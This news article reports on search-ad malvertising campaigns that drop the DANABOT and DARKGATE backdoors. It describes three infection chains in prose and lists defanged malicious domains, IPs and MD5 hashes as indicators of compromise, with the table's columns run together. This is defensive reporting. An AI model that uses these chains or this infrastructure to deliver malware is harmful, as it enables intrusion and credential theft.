Cyber Security News

Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malwares

Threat actors are purchasing advertisements for malicious websites to lure victims into downloading malware, which can eventually lead to data theft and ransomware. 

This technique was used in several ad platforms, including search engine ads and social media ads, as they provide a wide range of controls like specific audiences, geographic locations, IP address ranges, browsing history, and device types.

Search Engine Ads Deliver Malware

According to the reports shared with Cyber Security News, there have been four different malware families observed during the investigation of these malicious ad campaigns, which were, 

  • PAPERDROP – VBScript-based downloader that communicates with HTTPS and also downloads and executes DANABOT.
  • PAPERTEAR – VBScript-based downloader observed to enumerate the list of local processes.
  • DANABOT – Backdoor written in Delphi that uses custom binary protocol over TCP.
  • DARKGATE – Backdoor written in Delphi that is capable of capturing keystrokes, executing commands, file transfer, and credential theft.

In addition to this three different delivery chains were observed in two of them used a renamed version of cURL binary.

Infection Chain #1: PAPERDROP > DANABOT

In this infection chain, the wscript.exe process is used to initial a DNS request which then executes the Windows installer utility msiexec.exe and installs an application. Furthermore, it uses the rundll32.exe process to load the dropper DLL and executes the “start” function to launch the DANABOT payload.

Infection Chain #1 (Source: Mandiant)

Infection Chain #2: PAPERTEAR > RENAMED CURL > DARKGATE

In this second infection chain, the PAPERTEAR downloader initiates an HTTP POST request to infocatalog[.]pics over port 8080. After this, the wscript.exe executes the one-liner command that eventually drops the DARKGATE malware onto the victim’s system.

Infection Chain #2 (Source: Mandiant)

Infection Chain #3: PAPERDROP > RENAMED CURL > DANABOT

The third execution chain is similar to the second one but here the PAPERDROP downloader executes another extended one-liner that uses the renamed curl.exe binary for downloading and installing a malicious package file which drops the DANABOT malware.

Infection Chain #3 (Source: Mandiant)

Furthermore, a complete report has been published which provides detailed information about the malware capabilities, execution methods, chains, and other information.

Indicators of Compromise

TypeValueCampaignMalware FamilyAttribution
Domainwww.claimprocessing[.]org23-046UNC2975
Domainwww.treasurydept[.]org23-046UNC2975
Domainwww.assetfinder[.]org23-046UNC2975
Domaingfind[.]org23-046UNC2975
Domainclaimunclaimed[.]org23-046UNC2975
Domaintreasurydept[.]org23-046UNC2975
Domainwww.myunclaimedcash[.]org23-046UNC2975
Domainfreelookup[.]org23-046UNC2975
Domaincapitalfinders[.]org23-046UNC2975
Domainplano.soulcarelife[.]org23-046PAPERDROPUNC2975
Domainpittsburgh.soulcarelife[.]org23-046PAPERDROPUNC2975
Domaindurham.soulcarelife[.]org23-046PAPERDROPUNC2975
Domainmesa.halibut[.]sbs23-046PAPERDROPUNC2975
Domainarlington.barracudas[.]sbs23-046PAPERDROPUNC2975
Domainlugbara[.]top23-046PAPERDROPUNC2975
Domainlewru[.]top23-046PAPERDROPUNC2975
Domaininfocatalog[.]pics23-046DARKGATEUNC5085
Domainbikeontop[.]shop23-046DARKGATEUNC5085
Domainpositivereview[.]cloud23-046DARKGATEUNC5085
Domaindreamteamup[.]shop23-046DARKGATEUNC5085
Domainwhatup[.]cloud23-046DARKGATEUNC5085
Domainthebesttime[.]buzz23-046DARKGATEUNC5085
IP Address47.253.165[.]123-046UNC2975
IP Address8.209.99[.]23023-046UNC2975
IP Address47.252.45[.]17323-046UNC2975
IP Address47.252.33[.]13123-046UNC2975
IP Address47.253.141[.]1223-046UNC2975
IP Address47.252.45[.]17323-046UNC2975
IP Address34.16.181[.]023-046DANABOT
IP Address35.247.194[.]7223-046DANABOT
IP Address35.203.111[.]22823-046DANABOT
IP Address94.228[.]169[.]14323-051PAPERTEARUNC5085
MD59f9c5a1269667171e1ac328f7f7f6cb323-046DARKGATEUNC5085
MD52c16eafd0023ea5cb8e9537da442047e23-046PAPERDROP (Type I)UNC2975
MD57544f5bb88ad481f720a9d9f94d95b3023-046PAPERDROP(Type I)UNC2975
MD5862a42a91b5734062d47c37fdd80c633PAPERDROP(Type II)UNC2956
MD5650b0b12b21e9664d5c771d78738cf9fPAPERTEARUNC5085
MD59120c82b0920b9db39894107b5494ccd23-051PAPERTEARUNC5085
Source: Mandiant
Eswar

Eswar is a Cyber security reporter with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is reporting data breach, Privacy and APT Threats.

Share
Published by
Eswar
Tags: cyber securitymalwaresearch engine Ads
1 year ago

Recent Posts

Cyber Guardians: INE Security Champions Cybersecurity Training During National Physicians Week 2025

Cary, NC, March 24th, 2025, CyberNewsWire INE Security, a global provider of cybersecurity training and…

9 hours ago

Hackers Using Fake Semrush Ads to Steal Google Accounts Login Credentials

A sophisticated phishing campaign targeting Google account credentials through fake Semrush advertisements has emerged, posing…

12 hours ago

Pocket Card Users Under Attack Via Sophisticated Phishing Campaign

A highly targeted phishing campaign is currently exploiting Pocket Card users through elaborately crafted emails…

12 hours ago

Operation Red Card – 300+ Cyber Criminals Arrested Linking to Multiple Hacking Activities

INTERPOL led a multi-national law enforcement operation dubbed "Operation Red Card," which has resulted in…

12 hours ago

Hackers Could Drop Teams Malware via Browser’s Cache Smuggling

A novel attack vector combining browser cache exploitation and DLL proxying has emerged as a…

12 hours ago

New Linux Kernel Rust Module Unveiled to Detect Rootkits

A groundbreaking security tool has emerged in the ongoing battle against sophisticated Linux malware. A…

13 hours ago